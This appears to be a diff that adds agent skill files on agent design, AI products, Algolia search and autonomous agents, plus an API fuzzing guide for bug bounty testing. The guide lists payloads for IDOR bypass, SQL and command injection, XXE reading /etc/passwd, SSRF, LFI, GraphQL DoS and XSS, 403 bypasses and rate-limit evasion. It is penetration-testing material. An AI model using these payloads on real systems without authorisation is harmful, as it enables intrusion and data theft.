I understand that agents fail in unexpected ways - I design for graceful
|
||||
degradation and clear failure modes. I balance autonomy with oversight,
|
||||
knowing when an agent should ask for help vs proceed independently.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Agent architecture design
|
||||
- Tool and function calling
|
||||
- Agent memory systems
|
||||
- Planning and reasoning strategies
|
||||
- Multi-agent orchestration
|
||||
- Agent evaluation and debugging
|
||||
|
||||
## Requirements
|
||||
|
||||
- LLM API usage
|
||||
- Understanding of function calling
|
||||
- Basic prompt engineering
|
||||
|
||||
## Patterns
|
||||
|
||||
### ReAct Loop
|
||||
|
||||
Reason-Act-Observe cycle for step-by-step execution
|
||||
|
||||
```javascript
|
||||
- Thought: reason about what to do next
|
||||
- Action: select and invoke a tool
|
||||
- Observation: process tool result
|
||||
- Repeat until task complete or stuck
|
||||
- Include max iteration limits
|
||||
```
|
||||
|
||||
### Plan-and-Execute
|
||||
|
||||
Plan first, then execute steps
|
||||
|
||||
```javascript
|
||||
- Planning phase: decompose task into steps
|
||||
- Execution phase: execute each step
|
||||
- Replanning: adjust plan based on results
|
||||
- Separate planner and executor models possible
|
||||
```
|
||||
|
||||
### Tool Registry
|
||||
|
||||
Dynamic tool discovery and management
|
||||
|
||||
```javascript
|
||||
- Register tools with schema and examples
|
||||
- Tool selector picks relevant tools for task
|
||||
- Lazy loading for expensive tools
|
||||
- Usage tracking for optimization
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Unlimited Autonomy
|
||||
|
||||
### ❌ Tool Overload
|
||||
|
||||
### ❌ Memory Hoarding
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Agent loops without iteration limits | critical | Always set limits: |
|
||||
| Vague or incomplete tool descriptions | high | Write complete tool specs: |
|
||||
| Tool errors not surfaced to agent | high | Explicit error handling: |
|
||||
| Storing everything in agent memory | medium | Selective memory: |
|
||||
| Agent has too many tools | medium | Curate tools per task: |
|
||||
| Using multiple agents when one would work | medium | Justify multi-agent: |
|
||||
| Agent internals not logged or traceable | medium | Implement tracing: |
|
||||
| Fragile parsing of agent outputs | medium | Robust output handling: |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `rag-engineer`, `prompt-engineer`, `backend`, `mcp-builder`
|
||||
54
skills/ai-product/SKILL.md
Normal file
54
skills/ai-product/SKILL.md
Normal file
@@ -0,0 +1,54 @@
|
||||
---
|
||||
name: ai-product
|
||||
description: "Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt engineering that scales, AI UX that users trust, and cost optimization that doesn't bankrupt you. Use when: keywords, file_patterns, code_patterns."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# AI Product Development
|
||||
|
||||
You are an AI product engineer who has shipped LLM features to millions of
|
||||
users. You've debugged hallucinations at 3am, optimized prompts to reduce
|
||||
costs by 80%, and built safety systems that caught thousands of harmful
|
||||
outputs. You know that demos are easy and production is hard. You treat
|
||||
prompts as code, validate all outputs, and never trust an LLM blindly.
|
||||
|
||||
## Patterns
|
||||
|
||||
### Structured Output with Validation
|
||||
|
||||
Use function calling or JSON mode with schema validation
|
||||
|
||||
### Streaming with Progress
|
||||
|
||||
Stream LLM responses to show progress and reduce perceived latency
|
||||
|
||||
### Prompt Versioning and Testing
|
||||
|
||||
Version prompts in code and test with regression suite
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Demo-ware
|
||||
|
||||
**Why bad**: Demos deceive. Production reveals truth. Users lose trust fast.
|
||||
|
||||
### ❌ Context window stuffing
|
||||
|
||||
**Why bad**: Expensive, slow, hits limits. Dilutes relevant context with noise.
|
||||
|
||||
### ❌ Unstructured output parsing
|
||||
|
||||
**Why bad**: Breaks randomly. Inconsistent formats. Injection risks.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Trusting LLM output without validation | critical | # Always validate output: |
|
||||
| User input directly in prompts without sanitization | critical | # Defense layers: |
|
||||
| Stuffing too much into context window | high | # Calculate tokens before sending: |
|
||||
| Waiting for complete response before showing anything | high | # Stream responses: |
|
||||
| Not monitoring LLM API costs | high | # Track per-request: |
|
||||
| App breaks when LLM API fails | high | # Defense in depth: |
|
||||
| Not validating facts from LLM responses | critical | # For factual claims: |
|
||||
| Making LLM calls in synchronous request handlers | high | # Async patterns: |
|
||||
273
skills/ai-wrapper-product/SKILL.md
Normal file
273
skills/ai-wrapper-product/SKILL.md
Normal file
@@ -0,0 +1,273 @@
|
||||
---
|
||||
name: ai-wrapper-product
|
||||
description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Covers prompt engineering for products, cost management, rate limiting, and building defensible AI businesses. Use when: AI wrapper, GPT product, AI tool, wrap AI, AI SaaS."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# AI Wrapper Product
|
||||
|
||||
**Role**: AI Product Architect
|
||||
|
||||
You know AI wrappers get a bad rap, but the good ones solve real problems.
|
||||
You build products where AI is the engine, not the gimmick. You understand
|
||||
prompt engineering is product development. You balance costs with user
|
||||
experience. You create AI products people actually pay for and use daily.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- AI product architecture
|
||||
- Prompt engineering for products
|
||||
- API cost management
|
||||
- AI usage metering
|
||||
- Model selection
|
||||
- AI UX patterns
|
||||
- Output quality control
|
||||
- AI product differentiation
|
||||
|
||||
## Patterns
|
||||
|
||||
### AI Product Architecture
|
||||
|
||||
Building products around AI APIs
|
||||
|
||||
**When to use**: When designing an AI-powered product
|
||||
|
||||
```python
|
||||
## AI Product Architecture
|
||||
|
||||
### The Wrapper Stack
|
||||
```
|
||||
User Input
|
||||
↓
|
||||
Input Validation + Sanitization
|
||||
↓
|
||||
Prompt Template + Context
|
||||
↓
|
||||
AI API (OpenAI/Anthropic/etc.)
|
||||
↓
|
||||
Output Parsing + Validation
|
||||
↓
|
||||
User-Friendly Response
|
||||
```
|
||||
|
||||
### Basic Implementation
|
||||
```javascript
|
||||
import Anthropic from '@anthropic-ai/sdk';
|
||||
|
||||
const anthropic = new Anthropic();
|
||||
|
||||
async function generateContent(userInput, context) {
|
||||
// 1. Validate input
|
||||
if (!userInput || userInput.length > 5000) {
|
||||
throw new Error('Invalid input');
|
||||
}
|
||||
|
||||
// 2. Build prompt
|
||||
const systemPrompt = `You are a ${context.role}.
|
||||
Always respond in ${context.format}.
|
||||
Tone: ${context.tone}`;
|
||||
|
||||
// 3. Call API
|
||||
const response = await anthropic.messages.create({
|
||||
model: 'claude-3-haiku-20240307',
|
||||
max_tokens: 1000,
|
||||
system: systemPrompt,
|
||||
messages: [{
|
||||
role: 'user',
|
||||
content: userInput
|
||||
}]
|
||||
});
|
||||
|
||||
// 4. Parse and validate output
|
||||
const output = response.content[0].text;
|
||||
return parseOutput(output);
|
||||
}
|
||||
```
|
||||
|
||||
### Model Selection
|
||||
| Model | Cost | Speed | Quality | Use Case |
|
||||
|-------|------|-------|---------|----------|
|
||||
| GPT-4o | $$$ | Fast | Best | Complex tasks |
|
||||
| GPT-4o-mini | $ | Fastest | Good | Most tasks |
|
||||
| Claude 3.5 Sonnet | $$ | Fast | Excellent | Balanced |
|
||||
| Claude 3 Haiku | $ | Fastest | Good | High volume |
|
||||
```
|
||||
|
||||
### Prompt Engineering for Products
|
||||
|
||||
Production-grade prompt design
|
||||
|
||||
**When to use**: When building AI product prompts
|
||||
|
||||
```javascript
|
||||
## Prompt Engineering for Products
|
||||
|
||||
### Prompt Template Pattern
|
||||
```javascript
|
||||
const promptTemplates = {
|
||||
emailWriter: {
|
||||
system: `You are an expert email writer.
|
||||
Write professional, concise emails.
|
||||
Match the requested tone.
|
||||
Never include placeholder text.`,
|
||||
user: (input) => `Write an email:
|
||||
Purpose: ${input.purpose}
|
||||
Recipient: ${input.recipient}
|
||||
Tone: ${input.tone}
|
||||
Key points: ${input.points.join(', ')}
|
||||
Length: ${input.length} sentences`,
|
||||
},
|
||||
};
|
||||
```
|
||||
|
||||
### Output Control
|
||||
```javascript
|
||||
// Force structured output
|
||||
const systemPrompt = `
|
||||
Always respond with valid JSON in this format:
|
||||
{
|
||||
"title": "string",
|
||||
"content": "string",
|
||||
"suggestions": ["string"]
|
||||
}
|
||||
Never include any text outside the JSON.
|
||||
`;
|
||||
|
||||
// Parse with fallback
|
||||
function parseAIOutput(text) {
|
||||
try {
|
||||
return JSON.parse(text);
|
||||
} catch {
|
||||
// Fallback: extract JSON from response
|
||||
const match = text.match(/\{[\s\S]*\}/);
|
||||
if (match) return JSON.parse(match[0]);
|
||||
throw new Error('Invalid AI output');
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Quality Control
|
||||
| Technique | Purpose |
|
||||
|-----------|---------|
|
||||
| Examples in prompt | Guide output style |
|
||||
| Output format spec | Consistent structure |
|
||||
| Validation | Catch malformed responses |
|
||||
| Retry logic | Handle failures |
|
||||
| Fallback models | Reliability |
|
||||
```
|
||||
|
||||
### Cost Management
|
||||
|
||||
Controlling AI API costs
|
||||
|
||||
**When to use**: When building profitable AI products
|
||||
|
||||
```javascript
|
||||
## AI Cost Management
|
||||
|
||||
### Token Economics
|
||||
```javascript
|
||||
// Track usage
|
||||
async function callWithCostTracking(userId, prompt) {
|
||||
const response = await anthropic.messages.create({...});
|
||||
|
||||
// Log usage
|
||||
await db.usage.create({
|
||||
userId,
|
||||
inputTokens: response.usage.input_tokens,
|
||||
outputTokens: response.usage.output_tokens,
|
||||
cost: calculateCost(response.usage),
|
||||
model: 'claude-3-haiku',
|
||||
});
|
||||
|
||||
return response;
|
||||
}
|
||||
|
||||
function calculateCost(usage) {
|
||||
const rates = {
|
||||
'claude-3-haiku': { input: 0.25, output: 1.25 }, // per 1M tokens
|
||||
};
|
||||
const rate = rates['claude-3-haiku'];
|
||||
return (usage.input_tokens * rate.input +
|
||||
usage.output_tokens * rate.output) / 1_000_000;
|
||||
}
|
||||
```
|
||||
|
||||
### Cost Reduction Strategies
|
||||
| Strategy | Savings |
|
||||
|----------|---------|
|
||||
| Use cheaper models | 10-50x |
|
||||
| Limit output tokens | Variable |
|
||||
| Cache common queries | High |
|
||||
| Batch similar requests | Medium |
|
||||
| Truncate input | Variable |
|
||||
|
||||
### Usage Limits
|
||||
```javascript
|
||||
async function checkUsageLimits(userId) {
|
||||
const usage = await db.usage.sum({
|
||||
where: {
|
||||
userId,
|
||||
createdAt: { gte: startOfMonth() }
|
||||
}
|
||||
});
|
||||
|
||||
const limits = await getUserLimits(userId);
|
||||
if (usage.cost >= limits.monthlyCost) {
|
||||
throw new Error('Monthly limit reached');
|
||||
}
|
||||
return true;
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Thin Wrapper Syndrome
|
||||
|
||||
**Why bad**: No differentiation.
|
||||
Users just use ChatGPT.
|
||||
No pricing power.
|
||||
Easy to replicate.
|
||||
|
||||
**Instead**: Add domain expertise.
|
||||
Perfect the UX for specific task.
|
||||
Integrate into workflows.
|
||||
Post-process outputs.
|
||||
|
||||
### ❌ Ignoring Costs Until Scale
|
||||
|
||||
**Why bad**: Surprise bills.
|
||||
Negative unit economics.
|
||||
Can't price properly.
|
||||
Business isn't viable.
|
||||
|
||||
**Instead**: Track every API call.
|
||||
Know your cost per user.
|
||||
Set usage limits.
|
||||
Price with margin.
|
||||
|
||||
### ❌ No Output Validation
|
||||
|
||||
**Why bad**: AI hallucinates.
|
||||
Inconsistent formatting.
|
||||
Bad user experience.
|
||||
Trust issues.
|
||||
|
||||
**Instead**: Validate all outputs.
|
||||
Parse structured responses.
|
||||
Have fallback handling.
|
||||
Post-process for consistency.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| AI API costs spiral out of control | high | ## Controlling AI Costs |
|
||||
| App breaks when hitting API rate limits | high | ## Handling Rate Limits |
|
||||
| AI gives wrong or made-up information | high | ## Handling Hallucinations |
|
||||
| AI responses too slow for good UX | medium | ## Improving AI Latency |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `llm-architect`, `micro-saas-launcher`, `frontend`, `backend`
|
||||
66
skills/algolia-search/SKILL.md
Normal file
66
skills/algolia-search/SKILL.md
Normal file
@@ -0,0 +1,66 @@
|
||||
---
|
||||
name: algolia-search
|
||||
description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning Use when: adding search to, algolia, instantsearch, search api, search functionality."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Algolia Search Integration
|
||||
|
||||
## Patterns
|
||||
|
||||
### React InstantSearch with Hooks
|
||||
|
||||
Modern React InstantSearch setup using hooks for type-ahead search.
|
||||
|
||||
Uses react-instantsearch-hooks-web package with algoliasearch client.
|
||||
Widgets are components that can be customized with classnames.
|
||||
|
||||
Key hooks:
|
||||
- useSearchBox: Search input handling
|
||||
- useHits: Access search results
|
||||
- useRefinementList: Facet filtering
|
||||
- usePagination: Result pagination
|
||||
- useInstantSearch: Full state access
|
||||
|
||||
|
||||
### Next.js Server-Side Rendering
|
||||
|
||||
SSR integration for Next.js with react-instantsearch-nextjs package.
|
||||
|
||||
Use <InstantSearchNext> instead of <InstantSearch> for SSR.
|
||||
Supports both Pages Router and App Router (experimental).
|
||||
|
||||
Key considerations:
|
||||
- Set dynamic = 'force-dynamic' for fresh results
|
||||
- Handle URL synchronization with routing prop
|
||||
- Use getServerState for initial state
|
||||
|
||||
|
||||
### Data Synchronization and Indexing
|
||||
|
||||
Indexing strategies for keeping Algolia in sync with your data.
|
||||
|
||||
Three main approaches:
|
||||
1. Full Reindexing - Replace entire index (expensive)
|
||||
2. Full Record Updates - Replace individual records
|
||||
3. Partial Updates - Update specific attributes only
|
||||
|
||||
Best practices:
|
||||
- Batch records (ideal: 10MB, 1K-10K records per batch)
|
||||
- Use incremental updates when possible
|
||||
- partialUpdateObjects for attribute-only changes
|
||||
- Avoid deleteBy (computationally expensive)
|
||||
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
430
skills/api-fuzzing-bug-bounty/SKILL.md
Normal file
430
skills/api-fuzzing-bug-bounty/SKILL.md
Normal file
@@ -0,0 +1,430 @@
|
||||
---
|
||||
name: API Fuzzing for Bug Bounty
|
||||
description: This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques.
|
||||
---
|
||||
|
||||
# API Fuzzing for Bug Bounty
|
||||
|
||||
## Purpose
|
||||
|
||||
Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
|
||||
|
||||
## Inputs/Prerequisites
|
||||
|
||||
- Burp Suite or similar proxy tool
|
||||
- API wordlists (SecLists, api_wordlist)
|
||||
- Understanding of REST/GraphQL/SOAP protocols
|
||||
- Python for scripting
|
||||
- Target API endpoints and documentation (if available)
|
||||
|
||||
## Outputs/Deliverables
|
||||
|
||||
- Identified API vulnerabilities
|
||||
- IDOR exploitation proofs
|
||||
- Authentication bypass techniques
|
||||
- SQL injection points
|
||||
- Unauthorized data access documentation
|
||||
|
||||
---
|
||||
|
||||
## API Types Overview
|
||||
|
||||
| Type | Protocol | Data Format | Structure |
|
||||
|------|----------|-------------|-----------|
|
||||
| SOAP | HTTP | XML | Header + Body |
|
||||
| REST | HTTP | JSON/XML/URL | Defined endpoints |
|
||||
| GraphQL | HTTP | Custom Query | Single endpoint |
|
||||
|
||||
---
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Step 1: API Reconnaissance
|
||||
|
||||
Identify API type and enumerate endpoints:
|
||||
|
||||
```bash
|
||||
# Check for Swagger/OpenAPI documentation
|
||||
/swagger.json
|
||||
/openapi.json
|
||||
/api-docs
|
||||
/v1/api-docs
|
||||
/swagger-ui.html
|
||||
|
||||
# Use Kiterunner for API discovery
|
||||
kr scan https://target.com -w routes-large.kite
|
||||
|
||||
# Extract paths from Swagger
|
||||
python3 json2paths.py swagger.json
|
||||
```
|
||||
|
||||
### Step 2: Authentication Testing
|
||||
|
||||
```bash
|
||||
# Test different login paths
|
||||
/api/mobile/login
|
||||
/api/v3/login
|
||||
/api/magic_link
|
||||
/api/admin/login
|
||||
|
||||
# Check rate limiting on auth endpoints
|
||||
# If no rate limit → brute force possible
|
||||
|
||||
# Test mobile vs web API separately
|
||||
# Don't assume same security controls
|
||||
```
|
||||
|
||||
### Step 3: IDOR Testing
|
||||
|
||||
Insecure Direct Object Reference is the most common API vulnerability:
|
||||
|
||||
```bash
|
||||
# Basic IDOR
|
||||
GET /api/users/1234 → GET /api/users/1235
|
||||
|
||||
# Even if ID is email-based, try numeric
|
||||
/?user_id=111 instead of /?user_id=user@mail.com
|
||||
|
||||
# Test /me/orders vs /user/654321/orders
|
||||
```
|
||||
|
||||
**IDOR Bypass Techniques:**
|
||||
|
||||
```bash
|
||||
# Wrap ID in array
|
||||
{"id":111} → {"id":[111]}
|
||||
|
||||
# JSON wrap
|
||||
{"id":111} → {"id":{"id":111}}
|
||||
|
||||
# Send ID twice
|
||||
URL?id=<LEGIT>&id=<VICTIM>
|
||||
|
||||
# Wildcard injection
|
||||
{"user_id":"*"}
|
||||
|
||||
# Parameter pollution
|
||||
/api/get_profile?user_id=<victim>&user_id=<legit>
|
||||
{"user_id":<legit_id>,"user_id":<victim_id>}
|
||||
```
|
||||
|
||||
### Step 4: Injection Testing
|
||||
|
||||
**SQL Injection in JSON:**
|
||||
|
||||
```json
|
||||
{"id":"56456"} → OK
|
||||
{"id":"56456 AND 1=1#"} → OK
|
||||
{"id":"56456 AND 1=2#"} → OK
|
||||
{"id":"56456 AND 1=3#"} → ERROR (vulnerable!)
|
||||
{"id":"56456 AND sleep(15)#"} → SLEEP 15 SEC
|
||||
```
|
||||
|
||||
**Command Injection:**
|
||||
|
||||
```bash
|
||||
# Ruby on Rails
|
||||
?url=Kernel#open → ?url=|ls
|
||||
|
||||
# Linux command injection
|
||||
api.url.com/endpoint?name=file.txt;ls%20/
|
||||
```
|
||||
|
||||
**XXE Injection:**
|
||||
|
||||
```xml
|
||||
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
|
||||
```
|
||||
|
||||
**SSRF via API:**
|
||||
|
||||
```html
|
||||
<object data="http://127.0.0.1:8443"/>
|
||||
<img src="http://127.0.0.1:445"/>
|
||||
```
|
||||
|
||||
**.NET Path.Combine Vulnerability:**
|
||||
|
||||
```bash
|
||||
# If .NET app uses Path.Combine(path_1, path_2)
|
||||
# Test for path traversal
|
||||
https://example.org/download?filename=a.png
|
||||
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
|
||||
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
|
||||
```
|
||||
|
||||
### Step 5: Method Testing
|
||||
|
||||
```bash
|
||||
# Test all HTTP methods
|
||||
GET /api/v1/users/1
|
||||
POST /api/v1/users/1
|
||||
PUT /api/v1/users/1
|
||||
DELETE /api/v1/users/1
|
||||
PATCH /api/v1/users/1
|
||||
|
||||
# Switch content type
|
||||
Content-Type: application/json → application/xml
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## GraphQL-Specific Testing
|
||||
|
||||
### Introspection Query
|
||||
|
||||
Fetch entire backend schema:
|
||||
|
||||
```graphql
|
||||
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
|
||||
```
|
||||
|
||||
**URL-encoded version:**
|
||||
|
||||
```
|
||||
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
|
||||
```
|
||||
|
||||
### GraphQL IDOR
|
||||
|
||||
```graphql
|
||||
# Try accessing other user IDs
|
||||
query {
|
||||
user(id: "OTHER_USER_ID") {
|
||||
email
|
||||
password
|
||||
creditCard
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### GraphQL SQL/NoSQL Injection
|
||||
|
||||
```graphql
|
||||
mutation {
|
||||
login(input: {
|
||||
email: "test' or 1=1--"
|
||||
password: "password"
|
||||
}) {
|
||||
success
|
||||
jwt
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Rate Limit Bypass (Batching)
|
||||
|
||||
```graphql
|
||||
mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
|
||||
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
|
||||
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
|
||||
```
|
||||
|
||||
### GraphQL DoS (Nested Queries)
|
||||
|
||||
```graphql
|
||||
query {
|
||||
posts {
|
||||
comments {
|
||||
user {
|
||||
posts {
|
||||
comments {
|
||||
user {
|
||||
posts { ... }
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### GraphQL XSS
|
||||
|
||||
```bash
|
||||
# XSS via GraphQL endpoint
|
||||
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
|
||||
|
||||
# URL-encoded XSS
|
||||
http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
|
||||
```
|
||||
|
||||
### GraphQL Tools
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| GraphCrawler | Schema discovery |
|
||||
| graphw00f | Fingerprinting |
|
||||
| clairvoyance | Schema reconstruction |
|
||||
| InQL | Burp extension |
|
||||
| GraphQLmap | Exploitation |
|
||||
|
||||
---
|
||||
|
||||
## Endpoint Bypass Techniques
|
||||
|
||||
When receiving 403/401, try these bypasses:
|
||||
|
||||
```bash
|
||||
# Original blocked request
|
||||
/api/v1/users/sensitivedata → 403
|
||||
|
||||
# Bypass attempts
|
||||
/api/v1/users/sensitivedata.json
|
||||
/api/v1/users/sensitivedata?
|
||||
/api/v1/users/sensitivedata/
|
||||
/api/v1/users/sensitivedata??
|
||||
/api/v1/users/sensitivedata%20
|
||||
/api/v1/users/sensitivedata%09
|
||||
/api/v1/users/sensitivedata#
|
||||
/api/v1/users/sensitivedata&details
|
||||
/api/v1/users/..;/sensitivedata
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Output Exploitation
|
||||
|
||||
### PDF Export Attacks
|
||||
|
||||
```html
|
||||
<!-- LFI via PDF export -->
|
||||
<iframe src="file:///etc/passwd" height=1000 width=800>
|
||||
|
||||
<!-- SSRF via PDF export -->
|
||||
<object data="http://127.0.0.1:8443"/>
|
||||
|
||||
<!-- Port scanning -->
|
||||
<img src="http://127.0.0.1:445"/>
|
||||
|
||||
<!-- IP disclosure -->
|
||||
<img src="https://iplogger.com/yourcode.gif"/>
|
||||
```
|
||||
|
||||
### DoS via Limits
|
||||
|
||||
```bash
|
||||
# Normal request
|
||||
/api/news?limit=100
|
||||
|
||||
# DoS attempt
|
||||
/api/news?limit=9999999999
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Common API Vulnerabilities Checklist
|
||||
|
||||
| Vulnerability | Description |
|
||||
|---------------|-------------|
|
||||
| API Exposure | Unprotected endpoints exposed publicly |
|
||||
| Misconfigured Caching | Sensitive data cached incorrectly |
|
||||
| Exposed Tokens | API keys/tokens in responses or URLs |
|
||||
| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |
|
||||
| IDOR / BOLA | Broken Object Level Authorization |
|
||||
| Undocumented Endpoints | Hidden admin/debug endpoints |
|
||||
| Different Versions | Security gaps in older API versions |
|
||||
| Rate Limiting | Missing or bypassable rate limits |
|
||||
| Race Conditions | TOCTOU vulnerabilities |
|
||||
| XXE Injection | XML parser exploitation |
|
||||
| Content Type Issues | Switching between JSON/XML |
|
||||
| HTTP Method Tampering | GET→DELETE/PUT abuse |
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Vulnerability | Test Payload | Risk |
|
||||
|---------------|--------------|------|
|
||||
| IDOR | Change user_id parameter | High |
|
||||
| SQLi | `' OR 1=1--` in JSON | Critical |
|
||||
| Command Injection | `; ls /` | Critical |
|
||||
| XXE | DOCTYPE with ENTITY | High |
|
||||
| SSRF | Internal IP in params | High |
|
||||
| Rate Limit Bypass | Batch requests | Medium |
|
||||
| Method Tampering | GET→DELETE | High |
|
||||
|
||||
---
|
||||
|
||||
## Tools Reference
|
||||
|
||||
| Category | Tool | URL |
|
||||
|----------|------|-----|
|
||||
| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
|
||||
| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |
|
||||
| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |
|
||||
| API Security | apicheck | github.com/BBVA/apicheck |
|
||||
| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
|
||||
| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |
|
||||
| API Toolkit | APIKit | github.com/API-Security/APIKit |
|
||||
| API Keys | API Guesser | api-guesser.netlify.app |
|
||||
| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |
|
||||
| GraphQL | InQL | github.com/doyensec/inql |
|
||||
| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |
|
||||
| GraphQL | graphw00f | github.com/dolevf/graphw00f |
|
||||
| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |
|
||||
| GraphQL | batchql | github.com/assetnote/batchql |
|
||||
| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |
|
||||
| Wordlists | SecLists | github.com/danielmiessler/SecLists |
|
||||
| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
|
||||
| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |
|
||||
| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
|
||||
| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |
|
||||
|
||||
---
|
||||
|
||||
## Constraints
|
||||
|
||||
**Must:**
|
||||
- Test mobile, web, and developer APIs separately
|
||||
- Check all API versions (/v1, /v2, /v3)
|
||||
- Validate both authenticated and unauthenticated access
|
||||
|
||||
**Must Not:**
|
||||
- Assume same security controls across API versions
|
||||
- Skip testing undocumented endpoints
|
||||
- Ignore rate limiting checks
|
||||
|
||||
**Should:**
|
||||
- Add `X-Requested-With: XMLHttpRequest` header to simulate frontend
|
||||
- Check archive.org for historical API endpoints
|
||||
- Test for race conditions on sensitive operations
|
||||
|
||||
---
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: IDOR Exploitation
|
||||
|
||||
```bash
|
||||
# Original request (own data)
|
||||
GET /api/v1/invoices/12345
|
||||
Authorization: Bearer <token>
|
||||
|
||||
# Modified request (other user's data)
|
||||
GET /api/v1/invoices/12346
|
||||
Authorization: Bearer <token>
|
||||
|
||||
# Response reveals other user's invoice data
|
||||
```
|
||||
|
||||
### Example 2: GraphQL Introspection
|
||||
|
||||
```bash
|
||||
curl -X POST https://target.com/graphql \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"query":"{__schema{types{name,fields{name}}}}"}'
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solution |
|
||||
|-------|----------|
|
||||
| API returns nothing | Add `X-Requested-With: XMLHttpRequest` header |
|
||||
| 401 on all endpoints | Try adding `?user_id=1` parameter |
|
||||
| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |
|
||||
| Rate limited | Use IP rotation or batch requests |
|
||||
| Can't find endpoints | Check Swagger, archive.org, JS files |
|
||||
761
skills/autonomous-agent-patterns/SKILL.md
Normal file
761
skills/autonomous-agent-patterns/SKILL.md
Normal file
@@ -0,0 +1,761 @@
|
||||
---
|
||||
name: autonomous-agent-patterns
|
||||
description: "Design patterns for building autonomous coding agents. Covers tool integration, permission systems, browser automation, and human-in-the-loop workflows. Use when building AI agents, designing tool APIs, implementing permission systems, or creating autonomous coding assistants."
|
||||
---
|
||||
|
||||
# 🕹️ Autonomous Agent Patterns
|
||||
|
||||
> Design patterns for building autonomous coding agents, inspired by [Cline](https://github.com/cline/cline) and [OpenAI Codex](https://github.com/openai/codex).
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
Use this skill when:
|
||||
|
||||
- Building autonomous AI agents
|
||||
- Designing tool/function calling APIs
|
||||
- Implementing permission and approval systems
|
||||
- Creating browser automation for agents
|
||||
- Designing human-in-the-loop workflows
|
||||
|
||||
---
|
||||
|
||||
## 1. Core Agent Architecture
|
||||
|
||||
### 1.1 Agent Loop
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────┐
|
||||
│ AGENT LOOP │
|
||||
│ │
|
||||
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
|
||||
│ │ Think │───▶│ Decide │───▶│ Act │ │
|
||||
│ │ (Reason) │ │ (Plan) │ │ (Execute)│ │
|
||||
│ └──────────┘ └──────────┘ └──────────┘ │
|
||||
│ ▲ │ │
|
||||
